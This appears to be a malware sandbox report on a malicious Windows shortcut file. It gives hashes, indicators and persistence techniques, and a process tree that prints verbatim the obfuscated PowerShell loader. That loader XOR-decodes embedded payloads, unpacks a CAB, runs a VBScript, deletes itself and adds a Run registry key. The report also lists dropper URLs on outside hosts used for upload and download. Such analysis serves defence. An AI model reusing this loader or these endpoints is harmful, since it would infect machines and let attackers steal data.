6ca60e2c028afc8d8ae3209646b643aa1ae9694a3a652529afac6141c5d117ac

Analysis

max time kernel
152s
max time network
129s
platform
windows7_x64
resource
win7-20240221-en
resource tags

arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system
submitted
08/03/2024, 15:43

Sharing

Copy URL Twitter E-mail

Report Analysis Logs

General

Target

7a4a32b57bb087f3bfe0a640bd068108abb8ffe846f9fd2b5718774fc725efe3.lnk
Size

367.0MB
MD5

655893b1641565f8ea04da4d74116b8a
SHA1

ca5be2d5e6466b5726a3ada88bb9116247493501
SHA256

7a4a32b57bb087f3bfe0a640bd068108abb8ffe846f9fd2b5718774fc725efe3
SHA512

6efb7755be4ec4a4ec44e9392e8111c26c15d6b31b5f3f7775125b28cc144045271fd6463a83b2679b6fddd299cb4339517c642f0cc5d54733ba83362e30b540
SSDEEP

3072:uRrGHfOpcF/hptrdL3MbeL3b19yZFTvbzKObT01:HnrJ3Sib19yzzKZ

Score

10^/10

persistence

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

https://goosess.com/read/get.php?wc=iew&vf=lk0100

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

http://stuckss.com/upload.php

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

http://stuckss.com/upload.php

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

http://stuckss.com/upload.php

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

http://stuckss.com/upload.php

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

http://stuckss.com/list.php?f=AYFLYVMK.txt

Signatures

Blocklisted process makes network request 8 IoCs

flow	pid	Process
3	1104	powershell.exe
4	2024	powershell.exe
5	2232	powershell.exe
6	3036	powershell.exe
7	2580	powershell.exe
8	2404	powershell.exe
9	2800	powershell.exe
10	1576	powershell.exe

Deletes itself 1 IoCs

pid	Process
2816	powershell.exe

Adds Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-778096762-2241304387-192235952-1000\Software\Microsoft\Windows\CurrentVersion\Run\svchostno2 = "C:\\Users\\Public\\Documents\\start.vbs"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-778096762-2241304387-192235952-1000\Software\Microsoft\Windows\CurrentVersion\Run\svchostno2 = "C:\\Users\\Public\\Documents\\start.vbs"	reg.exe

Drops file in Windows directory 2 IoCs

description	ioc	Process
File opened for modification	C:\Windows\Logs\DPX\setuperr.log	expand.exe
File opened for modification	C:\Windows\Logs\DPX\setupact.log	expand.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Delays execution with timeout.exe 6 IoCs

evasion

pid	Process
1800	timeout.exe
1760	timeout.exe
1320	timeout.exe
1292	timeout.exe
1140	timeout.exe
2484	timeout.exe

Gathers system information 1 TTPs 2 IoCs

Runs systeminfo.exe.

System Information Discovery

T1082

pid	Process
2600	systeminfo.exe
1828	systeminfo.exe

Suspicious behavior: EnumeratesProcesses 16 IoCs

pid	Process
2816	powershell.exe
2484	powershell.exe
1728	powershell.exe
1260	powershell.exe
1104	powershell.exe
2024	powershell.exe
2232	powershell.exe
3036	powershell.exe
2580	powershell.exe
2404	powershell.exe
2800	powershell.exe
1576	powershell.exe
1288	powershell.exe
1352	powershell.exe
1108	powershell.exe
1612	powershell.exe

Suspicious use of AdjustPrivilegeToken 16 IoCs

description	pid	Process
Token: SeDebugPrivilege	2816	powershell.exe
Token: SeDebugPrivilege	2484	powershell.exe
Token: SeDebugPrivilege	1728	powershell.exe
Token: SeDebugPrivilege	1260	powershell.exe
Token: SeDebugPrivilege	1104	powershell.exe
Token: SeDebugPrivilege	2024	powershell.exe
Token: SeDebugPrivilege	2232	powershell.exe
Token: SeDebugPrivilege	3036	powershell.exe
Token: SeDebugPrivilege	2580	powershell.exe
Token: SeDebugPrivilege	2404	powershell.exe
Token: SeDebugPrivilege	2800	powershell.exe
Token: SeDebugPrivilege	1576	powershell.exe
Token: SeDebugPrivilege	1288	powershell.exe
Token: SeDebugPrivilege	1352	powershell.exe
Token: SeDebugPrivilege	1108	powershell.exe
Token: SeDebugPrivilege	1612	powershell.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 936 wrote to memory of 2692	936	cmd.exe	29
PID 936 wrote to memory of 2692	936	cmd.exe	29
PID 936 wrote to memory of 2692	936	cmd.exe	29
PID 2692 wrote to memory of 2816	2692	cmd.exe	30
PID 2692 wrote to memory of 2816	2692	cmd.exe	30
PID 2692 wrote to memory of 2816	2692	cmd.exe	30
PID 2816 wrote to memory of 2432	2816	powershell.exe	31
PID 2816 wrote to memory of 2432	2816	powershell.exe	31
PID 2816 wrote to memory of 2432	2816	powershell.exe	31
PID 2432 wrote to memory of 2484	2432	cmd.exe	33
PID 2432 wrote to memory of 2484	2432	cmd.exe	33
PID 2432 wrote to memory of 2484	2432	cmd.exe	33
PID 2816 wrote to memory of 2008	2816	powershell.exe	34
PID 2816 wrote to memory of 2008	2816	powershell.exe	34
PID 2816 wrote to memory of 2008	2816	powershell.exe	34
PID 2816 wrote to memory of 1676	2816	powershell.exe	35
PID 2816 wrote to memory of 1676	2816	powershell.exe	35
PID 2816 wrote to memory of 1676	2816	powershell.exe	35
PID 832 wrote to memory of 744	832	cmd.exe	38
PID 832 wrote to memory of 744	832	cmd.exe	38
PID 832 wrote to memory of 744	832	cmd.exe	38
PID 832 wrote to memory of 1728	832	cmd.exe	39
PID 832 wrote to memory of 1728	832	cmd.exe	39
PID 832 wrote to memory of 1728	832	cmd.exe	39
PID 832 wrote to memory of 2600	832	cmd.exe	40
PID 832 wrote to memory of 2600	832	cmd.exe	40
PID 832 wrote to memory of 2600	832	cmd.exe	40
PID 2484 wrote to memory of 1276	2484	powershell.exe	42
PID 2484 wrote to memory of 1276	2484	powershell.exe	42
PID 2484 wrote to memory of 1276	2484	powershell.exe	42
PID 2484 wrote to memory of 2296	2484	powershell.exe	43
PID 2484 wrote to memory of 2296	2484	powershell.exe	43
PID 2484 wrote to memory of 2296	2484	powershell.exe	43
PID 1212 wrote to memory of 1964	1212	cmd.exe	46
PID 1212 wrote to memory of 1964	1212	cmd.exe	46
PID 1212 wrote to memory of 1964	1212	cmd.exe	46
PID 1212 wrote to memory of 1260	1212	cmd.exe	47
PID 1212 wrote to memory of 1260	1212	cmd.exe	47
PID 1212 wrote to memory of 1260	1212	cmd.exe	47
PID 832 wrote to memory of 1292	832	cmd.exe	49
PID 832 wrote to memory of 1292	832	cmd.exe	49
PID 832 wrote to memory of 1292	832	cmd.exe	49
PID 1212 wrote to memory of 1828	1212	cmd.exe	50
PID 1212 wrote to memory of 1828	1212	cmd.exe	50
PID 1212 wrote to memory of 1828	1212	cmd.exe	50
PID 1212 wrote to memory of 1140	1212	cmd.exe	51
PID 1212 wrote to memory of 1140	1212	cmd.exe	51
PID 1212 wrote to memory of 1140	1212	cmd.exe	51
PID 832 wrote to memory of 1104	832	cmd.exe	52
PID 832 wrote to memory of 1104	832	cmd.exe	52
PID 832 wrote to memory of 1104	832	cmd.exe	52
PID 1212 wrote to memory of 2024	1212	cmd.exe	53
PID 1212 wrote to memory of 2024	1212	cmd.exe	53
PID 1212 wrote to memory of 2024	1212	cmd.exe	53
PID 1212 wrote to memory of 2232	1212	cmd.exe	54
PID 1212 wrote to memory of 2232	1212	cmd.exe	54
PID 1212 wrote to memory of 2232	1212	cmd.exe	54
PID 832 wrote to memory of 3036	832	cmd.exe	55
PID 832 wrote to memory of 3036	832	cmd.exe	55
PID 832 wrote to memory of 3036	832	cmd.exe	55
PID 1212 wrote to memory of 2580	1212	cmd.exe	56
PID 1212 wrote to memory of 2580	1212	cmd.exe	56
PID 1212 wrote to memory of 2580	1212	cmd.exe	56
PID 832 wrote to memory of 2404	832	cmd.exe	57

C:\Windows\system32\cmd.exe
cmd /c C:\Users\Admin\AppData\Local\Temp\7a4a32b57bb087f3bfe0a640bd068108abb8ffe846f9fd2b5718774fc725efe3.lnk
1⤵
- Suspicious use of WriteProcessMemory
PID:936
- C:\Windows\system32\cmd.exe
  "C:\Windows\system32\cmd.exe" /c p^owe^rshe^l^l -windowstyle hidden function QceEeRCSkI{param($UHCYbGzPEWQZ); ^<#missible#^>$oPath = Split-Path $UHCYbGzPEWQZ;^<#rewwore#^> return $oPath;};function MHMPpQGMSz{param($YCevQqmRGu); ^<#biophysically#^>$oPath = $YCevQqmRGu.substring(0,$YCevQqmRGu.length-4) + ''; ^<#bawling#^>return $oPath;};function GzAaIfXbMpmZ{$knPgzVjIuN = $env:public^<#edginesses#^> + '\' + 'UHCYbG.cab';^<#koranic#^> return $knPgzVjIuN;};function YLfJLrHwhVv{$jHCBAmkIQGt = $env:public^<#stampman#^> + '\' +^<#shatan#^> 'documents';^<#unimproved#^> return $jHCBAmkIQGt;};function IgnDoFlYXTz{$YDczVPCcDt = $env:public^<#porphyrize#^>+'\documents\start.vbs';^<#blameably#^> return $YDczVPCcDt;};function vnQykamhms{param($zQAJWCjcuWU);^<#unmodifiability#^> remove-item ^<#syndactylous#^> -path $zQAJWCjcuWU ^<#merohedral#^> -force;};function koMIoWakvBvW{param($FMGlWEFVsTs, $esLEposvvv);^<#tonite#^> expand $FMGlWEFVsTs ^<#decomponible#^> -F:* $esLEposvvv;};function hTyCsnXOYNpF{param($nawJOUnZzx,$RlTnDPsUBfVC,$eCNSSCoWDgl,$OmElfdBcJuP,$bzaDdFrZDQ);^<#discostomatous#^> $riBeXSGLoac=New-Object System.IO.FileStream(^<#copiable#^>$nawJOUnZzx,^<#strickenly#^>[System.IO.FileMode]::Open,^<#judicialness#^>[System.IO.FileAccess]::Read);^<#cadencing#^> $riBeXSGLoac.Seek(^<#jassid#^>$RlTnDPsUBfVC,[System.IO.SeekOrigin]::Begin);^<#destool#^> $lDWtpafJUDLQ=New-Object byte[] ^<#astatize#^>$eCNSSCoWDgl; ^<#broadax#^>$riBeXSGLoac.Read(^<#thiamines#^>$lDWtpafJUDLQ,0,^<#transpirometer#^>$eCNSSCoWDgl); $riBeXSGLoac.Close();for($EghEJyXHpIU=0;$EghEJyXHpIU -lt $eCNSSCoWDgl;$EghEJyXHpIU++){^<#electrotype#^>$lDWtpafJUDLQ[$EghEJyXHpIU]=$lDWtpafJUDLQ[$EghEJyXHpIU] -bxor $OmElfdBcJuP;}^<#sulfite#^> sc $bzaDdFrZDQ ^<#mouchoirs#^> $lDWtpafJUDLQ -Encoding ^<#overornamented#^> Byte;};function JLaLxKrqVQ{return Get-Location;};function FbVgDFIBFQY{^<#ransomfree#^>return $env:Temp;};function YzJlSxYuyv{$pPYxTUXWGppn = JLaLxKrqVQ; $MCMgQbotQbA = dvhYabCyYgb -MdzNcJucvkR $pPYxTUXWGppn; ^<#reoccurrences#^>if($MCMgQbotQbA.length -eq 0) {$pPYxTUXWGppn = FbVgDFIBFQY; ^<#philippicize#^>$MCMgQbotQbA = dvhYabCyYgb -MdzNcJucvkR $pPYxTUXWGppn;} return $MCMgQbotQbA;};function dvhYabCyYgb{param($MdzNcJucvkR); ^<#krises#^>$outpath=Get-ChildItem -Path ^<#tuckered#^> $MdzNcJucvkR -Recurse ^<#gunline#^>*.lnk ^| ^<#lavishes#^>where-object {$_.length -eq ^<#herbbane#^>0x16EF7F1A} ^| ^<#polymazia#^>Select-Object -ExpandProperty ^<#mailes#^>FullName; return ^<#boronic#^> $outpath;};$BVhUaiRxai = YzJlSxYuyv;^<#rhinolithic#^>$dirPath = QceEeRCSkI -UHCYbGzPEWQZ $BVhUaiRxai;^<#potline#^> $utUjrvVHil = MHMPpQGMSz -YCevQqmRGu $BVhUaiRxai;hTyCsnXOYNpF -nawJOUnZzx ^<#typhonia#^> $BVhUaiRxai -RlTnDPsUBfVC ^<#underemployment#^> 0x000020EC -eCNSSCoWDgl 0x00006B92 -OmElfdBcJuP ^<#prefiguratively#^> 0x51 -bzaDdFrZDQ ^<#gallinae#^> $utUjrvVHil;^<#appd#^> ^& $utUjrvVHil;$ipSanAloserA=GzAaIfXbMpmZ;^<#superchery#^>hTyCsnXOYNpF -nawJOUnZzx ^<#dioon#^> $BVhUaiRxai -RlTnDPsUBfVC ^<#taxation#^> 0x00008C7E -eCNSSCoWDgl ^<#skeens#^> 0x00013CCF -OmElfdBcJuP ^<#brooch#^> 0x88 -bzaDdFrZDQ ^<#unreckingness#^> $ipSanAloserA;^<#anthypophoretic#^>vnQykamhms -zQAJWCjcuWU $BVhUaiRxai;$TAsjCZBdLsHU = YLfJLrHwhVv;^<#narthexes#^>koMIoWakvBvW -FMGlWEFVsTs $ipSanAloserA -esLEposvvv ^<#britten#^>$TAsjCZBdLsHU;^<#phenylephrine#^>vnQykamhms -zQAJWCjcuWU $ipSanAloserA;$nQPICdrwsspp = ^<#crackback#^>IgnDoFlYXTz;^<#orientationally#^>^& $nQPICdrwsspp;
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2692
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -windowstyle hidden function QceEeRCSkI{param($UHCYbGzPEWQZ); <#missible#>$oPath = Split-Path $UHCYbGzPEWQZ;<#rewwore#> return $oPath;};function MHMPpQGMSz{param($YCevQqmRGu); <#biophysically#>$oPath = $YCevQqmRGu.substring(0,$YCevQqmRGu.length-4) + ''; <#bawling#>return $oPath;};function GzAaIfXbMpmZ{$knPgzVjIuN = $env:public<#edginesses#> + '\' + 'UHCYbG.cab';<#koranic#> return $knPgzVjIuN;};function YLfJLrHwhVv{$jHCBAmkIQGt = $env:public<#stampman#> + '\' +<#shatan#> 'documents';<#unimproved#> return $jHCBAmkIQGt;};function IgnDoFlYXTz{$YDczVPCcDt = $env:public<#porphyrize#>+'\documents\start.vbs';<#blameably#> return $YDczVPCcDt;};function vnQykamhms{param($zQAJWCjcuWU);<#unmodifiability#> remove-item <#syndactylous#> -path $zQAJWCjcuWU <#merohedral#> -force;};function koMIoWakvBvW{param($FMGlWEFVsTs, $esLEposvvv);<#tonite#> expand $FMGlWEFVsTs <#decomponible#> -F:* $esLEposvvv;};function hTyCsnXOYNpF{param($nawJOUnZzx,$RlTnDPsUBfVC,$eCNSSCoWDgl,$OmElfdBcJuP,$bzaDdFrZDQ);<#discostomatous#> $riBeXSGLoac=New-Object System.IO.FileStream(<#copiable#>$nawJOUnZzx,<#strickenly#>[System.IO.FileMode]::Open,<#judicialness#>[System.IO.FileAccess]::Read);<#cadencing#> $riBeXSGLoac.Seek(<#jassid#>$RlTnDPsUBfVC,[System.IO.SeekOrigin]::Begin);<#destool#> $lDWtpafJUDLQ=New-Object byte[] <#astatize#>$eCNSSCoWDgl; <#broadax#>$riBeXSGLoac.Read(<#thiamines#>$lDWtpafJUDLQ,0,<#transpirometer#>$eCNSSCoWDgl); $riBeXSGLoac.Close();for($EghEJyXHpIU=0;$EghEJyXHpIU -lt $eCNSSCoWDgl;$EghEJyXHpIU++){<#electrotype#>$lDWtpafJUDLQ[$EghEJyXHpIU]=$lDWtpafJUDLQ[$EghEJyXHpIU] -bxor $OmElfdBcJuP;}<#sulfite#> sc $bzaDdFrZDQ <#mouchoirs#> $lDWtpafJUDLQ -Encoding <#overornamented#> Byte;};function JLaLxKrqVQ{return Get-Location;};function FbVgDFIBFQY{<#ransomfree#>return $env:Temp;};function YzJlSxYuyv{$pPYxTUXWGppn = JLaLxKrqVQ; $MCMgQbotQbA = dvhYabCyYgb -MdzNcJucvkR $pPYxTUXWGppn; <#reoccurrences#>if($MCMgQbotQbA.length -eq 0) {$pPYxTUXWGppn = FbVgDFIBFQY; <#philippicize#>$MCMgQbotQbA = dvhYabCyYgb -MdzNcJucvkR $pPYxTUXWGppn;} return $MCMgQbotQbA;};function dvhYabCyYgb{param($MdzNcJucvkR); <#krises#>$outpath=Get-ChildItem -Path <#tuckered#> $MdzNcJucvkR -Recurse <#gunline#>*.lnk | <#lavishes#>where-object {$_.length -eq <#herbbane#>0x16EF7F1A} | <#polymazia#>Select-Object -ExpandProperty <#mailes#>FullName; return <#boronic#> $outpath;};$BVhUaiRxai = YzJlSxYuyv;<#rhinolithic#>$dirPath = QceEeRCSkI -UHCYbGzPEWQZ $BVhUaiRxai;<#potline#> $utUjrvVHil = MHMPpQGMSz -YCevQqmRGu $BVhUaiRxai;hTyCsnXOYNpF -nawJOUnZzx <#typhonia#> $BVhUaiRxai -RlTnDPsUBfVC <#underemployment#> 0x000020EC -eCNSSCoWDgl 0x00006B92 -OmElfdBcJuP <#prefiguratively#> 0x51 -bzaDdFrZDQ <#gallinae#> $utUjrvVHil;<#appd#> & $utUjrvVHil;$ipSanAloserA=GzAaIfXbMpmZ;<#superchery#>hTyCsnXOYNpF -nawJOUnZzx <#dioon#> $BVhUaiRxai -RlTnDPsUBfVC <#taxation#> 0x00008C7E -eCNSSCoWDgl <#skeens#> 0x00013CCF -OmElfdBcJuP <#brooch#> 0x88 -bzaDdFrZDQ <#unreckingness#> $ipSanAloserA;<#anthypophoretic#>vnQykamhms -zQAJWCjcuWU $BVhUaiRxai;$TAsjCZBdLsHU = YLfJLrHwhVv;<#narthexes#>koMIoWakvBvW -FMGlWEFVsTs $ipSanAloserA -esLEposvvv <#britten#>$TAsjCZBdLsHU;<#phenylephrine#>vnQykamhms -zQAJWCjcuWU $ipSanAloserA;$nQPICdrwsspp = <#crackback#>IgnDoFlYXTz;<#orientationally#>& $nQPICdrwsspp;
    3⤵
    - Deletes itself
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:2816
  - - C:\Windows\system32\cmd.exe
      "C:\Windows\system32\cmd.exe" /c p^owe^rshe^l^l -windowstyle hidden function QceEeRCSkI{param($UHCYbGzPEWQZ); ^<#missible#^>$oPath = Split-Path $UHCYbGzPEWQZ;^<#rewwore#^> return $oPath;};function MHMPpQGMSz{param($YCevQqmRGu); ^<#biophysically#^>$oPath = $YCevQqmRGu.substring(0,$YCevQqmRGu.length-4) + ''; ^<#bawling#^>return $oPath;};function GzAaIfXbMpmZ{$knPgzVjIuN = $env:public^<#edginesses#^> + '\' + 'UHCYbG.cab';^<#koranic#^> return $knPgzVjIuN;};function YLfJLrHwhVv{$jHCBAmkIQGt = $env:public^<#stampman#^> + '\' +^<#shatan#^> 'documents';^<#unimproved#^> return $jHCBAmkIQGt;};function IgnDoFlYXTz{$YDczVPCcDt = $env:public^<#porphyrize#^>+'\documents\start.vbs';^<#blameably#^> return $YDczVPCcDt;};function vnQykamhms{param($zQAJWCjcuWU);^<#unmodifiability#^> remove-item ^<#syndactylous#^> -path $zQAJWCjcuWU ^<#merohedral#^> -force;};function koMIoWakvBvW{param($FMGlWEFVsTs, $esLEposvvv);^<#tonite#^> expand $FMGlWEFVsTs ^<#decomponible#^> -F:* $esLEposvvv;};function hTyCsnXOYNpF{param($nawJOUnZzx,$RlTnDPsUBfVC,$eCNSSCoWDgl,$OmElfdBcJuP,$bzaDdFrZDQ);^<#discostomatous#^> $riBeXSGLoac=New-Object System.IO.FileStream(^<#copiable#^>$nawJOUnZzx,^<#strickenly#^>[System.IO.FileMode]::Open,^<#judicialness#^>[System.IO.FileAccess]::Read);^<#cadencing#^> $riBeXSGLoac.Seek(^<#jassid#^>$RlTnDPsUBfVC,[System.IO.SeekOrigin]::Begin);^<#destool#^> $lDWtpafJUDLQ=New-Object byte[] ^<#astatize#^>$eCNSSCoWDgl; ^<#broadax#^>$riBeXSGLoac.Read(^<#thiamines#^>$lDWtpafJUDLQ,0,^<#transpirometer#^>$eCNSSCoWDgl); $riBeXSGLoac.Close();for($EghEJyXHpIU=0;$EghEJyXHpIU -lt $eCNSSCoWDgl;$EghEJyXHpIU++){^<#electrotype#^>$lDWtpafJUDLQ[$EghEJyXHpIU]=$lDWtpafJUDLQ[$EghEJyXHpIU] -bxor $OmElfdBcJuP;}^<#sulfite#^> sc $bzaDdFrZDQ ^<#mouchoirs#^> $lDWtpafJUDLQ -Encoding ^<#overornamented#^> Byte;};function JLaLxKrqVQ{return Get-Location;};function FbVgDFIBFQY{^<#ransomfree#^>return $env:Temp;};function YzJlSxYuyv{$pPYxTUXWGppn = JLaLxKrqVQ; $MCMgQbotQbA = dvhYabCyYgb -MdzNcJucvkR $pPYxTUXWGppn; ^<#reoccurrences#^>if($MCMgQbotQbA.length -eq 0) {$pPYxTUXWGppn = FbVgDFIBFQY; ^<#philippicize#^>$MCMgQbotQbA = dvhYabCyYgb -MdzNcJucvkR $pPYxTUXWGppn;} return $MCMgQbotQbA;};function dvhYabCyYgb{param($MdzNcJucvkR); ^<#krises#^>$outpath=Get-ChildItem -Path ^<#tuckered#^> $MdzNcJucvkR -Recurse ^<#gunline#^>*.lnk ^| ^<#lavishes#^>where-object {$_.length -eq ^<#herbbane#^>0x16EF7F1A} ^| ^<#polymazia#^>Select-Object -ExpandProperty ^<#mailes#^>FullName; return ^<#boronic#^> $outpath;};$BVhUaiRxai = YzJlSxYuyv;^<#rhinolithic#^>$dirPath = QceEeRCSkI -UHCYbGzPEWQZ $BVhUaiRxai;^<#potline#^> $utUjrvVHil = MHMPpQGMSz -YCevQqmRGu $BVhUaiRxai;hTyCsnXOYNpF -nawJOUnZzx ^<#typhonia#^> $BVhUaiRxai -RlTnDPsUBfVC ^<#underemployment#^> 0x000020EC -eCNSSCoWDgl 0x00006B92 -OmElfdBcJuP ^<#prefiguratively#^> 0x51 -bzaDdFrZDQ ^<#gallinae#^> $utUjrvVHil;^<#appd#^> ^& $utUjrvVHil;$ipSanAloserA=GzAaIfXbMpmZ;^<#superchery#^>hTyCsnXOYNpF -nawJOUnZzx ^<#dioon#^> $BVhUaiRxai -RlTnDPsUBfVC ^<#taxation#^> 0x00008C7E -eCNSSCoWDgl ^<#skeens#^> 0x00013CCF -OmElfdBcJuP ^<#brooch#^> 0x88 -bzaDdFrZDQ ^<#unreckingness#^> $ipSanAloserA;^<#anthypophoretic#^>vnQykamhms -zQAJWCjcuWU $BVhUaiRxai;$TAsjCZBdLsHU = YLfJLrHwhVv;^<#narthexes#^>koMIoWakvBvW -FMGlWEFVsTs $ipSanAloserA -esLEposvvv ^<#britten#^>$TAsjCZBdLsHU;^<#phenylephrine#^>vnQykamhms -zQAJWCjcuWU $ipSanAloserA;$nQPICdrwsspp = ^<#crackback#^>IgnDoFlYXTz;^<#orientationally#^>^& $nQPICdrwsspp;
      4⤵
      Suspicious use of WriteProcessMemory
      PID:2432
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -windowstyle hidden function QceEeRCSkI{param($UHCYbGzPEWQZ); <#missible#>$oPath = Split-Path $UHCYbGzPEWQZ;<#rewwore#> return $oPath;};function MHMPpQGMSz{param($YCevQqmRGu); <#biophysically#>$oPath = $YCevQqmRGu.substring(0,$YCevQqmRGu.length-4) + ''; <#bawling#>return $oPath;};function GzAaIfXbMpmZ{$knPgzVjIuN = $env:public<#edginesses#> + '\' + 'UHCYbG.cab';<#koranic#> return $knPgzVjIuN;};function YLfJLrHwhVv{$jHCBAmkIQGt = $env:public<#stampman#> + '\' +<#shatan#> 'documents';<#unimproved#> return $jHCBAmkIQGt;};function IgnDoFlYXTz{$YDczVPCcDt = $env:public<#porphyrize#>+'\documents\start.vbs';<#blameably#> return $YDczVPCcDt;};function vnQykamhms{param($zQAJWCjcuWU);<#unmodifiability#> remove-item <#syndactylous#> -path $zQAJWCjcuWU <#merohedral#> -force;};function koMIoWakvBvW{param($FMGlWEFVsTs, $esLEposvvv);<#tonite#> expand $FMGlWEFVsTs <#decomponible#> -F:* $esLEposvvv;};function hTyCsnXOYNpF{param($nawJOUnZzx,$RlTnDPsUBfVC,$eCNSSCoWDgl,$OmElfdBcJuP,$bzaDdFrZDQ);<#discostomatous#> $riBeXSGLoac=New-Object System.IO.FileStream(<#copiable#>$nawJOUnZzx,<#strickenly#>[System.IO.FileMode]::Open,<#judicialness#>[System.IO.FileAccess]::Read);<#cadencing#> $riBeXSGLoac.Seek(<#jassid#>$RlTnDPsUBfVC,[System.IO.SeekOrigin]::Begin);<#destool#> $lDWtpafJUDLQ=New-Object byte[] <#astatize#>$eCNSSCoWDgl; <#broadax#>$riBeXSGLoac.Read(<#thiamines#>$lDWtpafJUDLQ,0,<#transpirometer#>$eCNSSCoWDgl); $riBeXSGLoac.Close();for($EghEJyXHpIU=0;$EghEJyXHpIU -lt $eCNSSCoWDgl;$EghEJyXHpIU++){<#electrotype#>$lDWtpafJUDLQ[$EghEJyXHpIU]=$lDWtpafJUDLQ[$EghEJyXHpIU] -bxor $OmElfdBcJuP;}<#sulfite#> sc $bzaDdFrZDQ <#mouchoirs#> $lDWtpafJUDLQ -Encoding <#overornamented#> Byte;};function JLaLxKrqVQ{return Get-Location;};function FbVgDFIBFQY{<#ransomfree#>return $env:Temp;};function YzJlSxYuyv{$pPYxTUXWGppn = JLaLxKrqVQ; $MCMgQbotQbA = dvhYabCyYgb -MdzNcJucvkR $pPYxTUXWGppn; <#reoccurrences#>if($MCMgQbotQbA.length -eq 0) {$pPYxTUXWGppn = FbVgDFIBFQY; <#philippicize#>$MCMgQbotQbA = dvhYabCyYgb -MdzNcJucvkR $pPYxTUXWGppn;} return $MCMgQbotQbA;};function dvhYabCyYgb{param($MdzNcJucvkR); <#krises#>$outpath=Get-ChildItem -Path <#tuckered#> $MdzNcJucvkR -Recurse <#gunline#>*.lnk | <#lavishes#>where-object {$_.length -eq <#herbbane#>0x16EF7F1A} | <#polymazia#>Select-Object -ExpandProperty <#mailes#>FullName; return <#boronic#> $outpath;};$BVhUaiRxai = YzJlSxYuyv;<#rhinolithic#>$dirPath = QceEeRCSkI -UHCYbGzPEWQZ $BVhUaiRxai;<#potline#> $utUjrvVHil = MHMPpQGMSz -YCevQqmRGu $BVhUaiRxai;hTyCsnXOYNpF -nawJOUnZzx <#typhonia#> $BVhUaiRxai -RlTnDPsUBfVC <#underemployment#> 0x000020EC -eCNSSCoWDgl 0x00006B92 -OmElfdBcJuP <#prefiguratively#> 0x51 -bzaDdFrZDQ <#gallinae#> $utUjrvVHil;<#appd#> & $utUjrvVHil;$ipSanAloserA=GzAaIfXbMpmZ;<#superchery#>hTyCsnXOYNpF -nawJOUnZzx <#dioon#> $BVhUaiRxai -RlTnDPsUBfVC <#taxation#> 0x00008C7E -eCNSSCoWDgl <#skeens#> 0x00013CCF -OmElfdBcJuP <#brooch#> 0x88 -bzaDdFrZDQ <#unreckingness#> $ipSanAloserA;<#anthypophoretic#>vnQykamhms -zQAJWCjcuWU $BVhUaiRxai;$TAsjCZBdLsHU = YLfJLrHwhVv;<#narthexes#>koMIoWakvBvW -FMGlWEFVsTs $ipSanAloserA -esLEposvvv <#britten#>$TAsjCZBdLsHU;<#phenylephrine#>vnQykamhms -zQAJWCjcuWU $ipSanAloserA;$nQPICdrwsspp = <#crackback#>IgnDoFlYXTz;<#orientationally#>& $nQPICdrwsspp;
        5⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:2484
      - C:\Windows\system32\expand.exe
        
        "C:\Windows\system32\expand.exe" C:\Users\Public\UHCYbG.cab -F:* C:\Users\Public\documents
        6⤵
        
        PID:1276
      - C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Public\documents\start.vbs"
        6⤵
        
        PID:2296
  - - C:\Windows\system32\expand.exe
      "C:\Windows\system32\expand.exe" C:\Users\Public\UHCYbG.cab -F:* C:\Users\Public\documents
      4⤵
      Drops file in Windows directory
      PID:2008
  - - C:\Windows\System32\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Public\documents\start.vbs"
      4⤵
      PID:1676

C:\Windows\system32\cmd.exe
cmd /c ""C:\Users\Public\documents\49120862.bat" "
1⤵
- Suspicious use of WriteProcessMemory
PID:832
- C:\Windows\system32\reg.exe
  reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v svchostno2 /t REG_SZ /d "C:\Users\Public\Documents\start.vbs" /f
  2⤵
  - Adds Run key to start application
  PID:744
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -command "function OnavpMuwhH{param ($UmdocLPwMM,$mIiGBlcMoFh);$VFPFIVkdaVP = [System.Text.Encoding]::UTF8.GetBytes($UmdocLPwMM); $vBZPSaMPhEL = [System.Text.Encoding]::UTF8.GetBytes($mIiGBlcMoFh);$VkbCqfOxmF = New-Object byte[](256);$pquiAKHwBut = New-Object byte[](256);for ($pVTuUFZgJeTg = 0; $pVTuUFZgJeTg -lt 256; $pVTuUFZgJeTg++) {$VkbCqfOxmF[$pVTuUFZgJeTg] = $pVTuUFZgJeTg;$pquiAKHwBut[$pVTuUFZgJeTg] = $vBZPSaMPhEL[$pVTuUFZgJeTg % $vBZPSaMPhEL.Length];}$cimcjZyRCUM = 0;for ($pVTuUFZgJeTg = 0; $pVTuUFZgJeTg -lt 256; $pVTuUFZgJeTg++) {$cimcjZyRCUM = ($cimcjZyRCUM + $VkbCqfOxmF[$pVTuUFZgJeTg] + $pquiAKHwBut[$pVTuUFZgJeTg]) % 256;$UaOsUHJTbs = $VkbCqfOxmF[$pVTuUFZgJeTg];$VkbCqfOxmF[$pVTuUFZgJeTg] = $VkbCqfOxmF[$cimcjZyRCUM];$VkbCqfOxmF[$cimcjZyRCUM] = $UaOsUHJTbs;}$QiBpTOnlBxk = New-Object byte[] $VFPFIVkdaVP.Length;$pVTuUFZgJeTg = 0;$cimcjZyRCUM = 0;for ($qlEMUTGteAdA = 0; 